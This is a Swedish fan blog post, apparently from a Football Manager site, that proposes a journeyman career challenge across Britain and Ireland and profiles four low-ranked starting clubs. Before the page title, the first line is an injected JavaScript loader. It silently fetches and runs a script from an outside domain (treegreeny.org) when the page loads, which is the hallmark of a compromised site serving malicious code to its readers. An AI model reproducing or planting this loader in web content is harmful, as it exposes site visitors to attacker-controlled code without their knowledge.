;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: brittisk journeyman – FMSweden
Meny Stäng

Veckans inspiration: brittisk journeyman

Denna söndag tänkte jag bjuda på ett tips som är ett välkänt koncept inom FM men med en speciell twist för att krydda till det hela ytterligare. Det handlar nämligen om en journeyman-save där man startar med en manager helt utan utbildning och erfarenhet. Målsättningen är att nå så långt som möjligt i sin personliga karriär, snarare än att vara en enda klubb trogen under hela saven.

Utmaningen i denna inspiration är att begränsa det geografiska området till de brittiska öarna + Irland, lite slarvigt uttryckt “fotbollens vagga” i Europa. Börja med att ladda samtliga serier från England, Nordirland, Wales, Skottland och Irland och lägg sedan till fler om du önskar. Målsättningen är sedan att vinna varje högstaliga i ett land, samtidigt som man måste spara England till sist eftersom den är högst rankad. Antingen börjar man som arbetslös eller så väljer man ett lag som är tippade sist i den lägsta divisionen i respektive land. Därför tänkte jag nedan bjuda på en liten lagguide för dessa lag.

Irland: Wexford
En halvprofessionell klubb med en arenakapacitet på 2500 åskådare som spelar i den irländska andraligan som bara innehar 10 lag. Således bör det rimligtvis vara den klubb som har den kortaste vägen till toppen. Wexford är en förhållandevis ny klubb som är grundad år 2007 och hade en ettårig sejour i högstaligan nio år därefter. I staden finns även en extra sporre med tanke på att damlaget är ett av landets mest framgångsrika lag. Det märks tydligt på herrtruppen att klubben hade “Youths” som tilläggsnamn för bara några år sedan, då den äldste spelaren är 25 år. Med andra ord finns det en stor utvecklingspotential här.

Nordirland: Moyola Park
En halvprofessionell klubb med en arenakapacitet på 2000 åskådare som spelar i den nordirländska tredjeligan som bara innehar 10 lag. Klubben är betydligt äldre och firar faktiskt sitt 140-årsjubiluem i år. Sedan 2007 har de spelat i den lägsta divisionen och på sistone har de oftast slutat på en mittenplacering. Truppen är ganska tunn och innehåller enbart inhemska spelare utöver en polsk målvakt. Dessutom är den hyfsat gammal. Här lär det alltså behövas en rejäl renovering för att kunna klättra, har du vad som krävs för att göra det?

Skottland: Albion Rovers
En halvprofessionell klubb med en arenakapacitet på 1500 åskådare som spelar i den skotska fjärdeligan som bara innehar 10 lag. Ännu en gammal klubb med anor från 1882, som åkte ur tredjeligan för något år sedan. Så sent som 2014 gick de faktiskt hela vägen till kvartsfinal i cupen, där de dock fick ge sig mot Rangers. Italienaren Morena utgör det enda exotiska inslaget i en trupp med ganska bra åldersmix. Eftersom Skottland har fyra divisioner i originaldatabasen blir detta den längsta resan om du väljer landet från start, vilket kanske gör att de andra länderna lockar mer första säsongen.

Wales: Buckley/Cwmamman
Wales har två serier på den andra nivån – nord respektive syd – vilket innebär två lagtips. Det förstnämnda laget är åtminstone halvprofessionellt medan det sistnämnda fortsatt är amatörer, något som försvårar FM-spelandet betänkligt med tanke på kontraktsproblematiken. Det lär alltså vara den absolut knivigaste startpunkten för din resa, så det får bli rekommendationen för den våghalsige. Annars är Buckley med sina dåliga faciliteter ingen dans på rosor heller för den delen. Pest eller kolera, bara att välja!

Hoppas ni fått upp ett sug att testa lyckan på öarna efter denna text. Lycka till med era saves och väl mött tills nästa vecka!

Please wait...

Liknande Inlägg

Lämna ett svar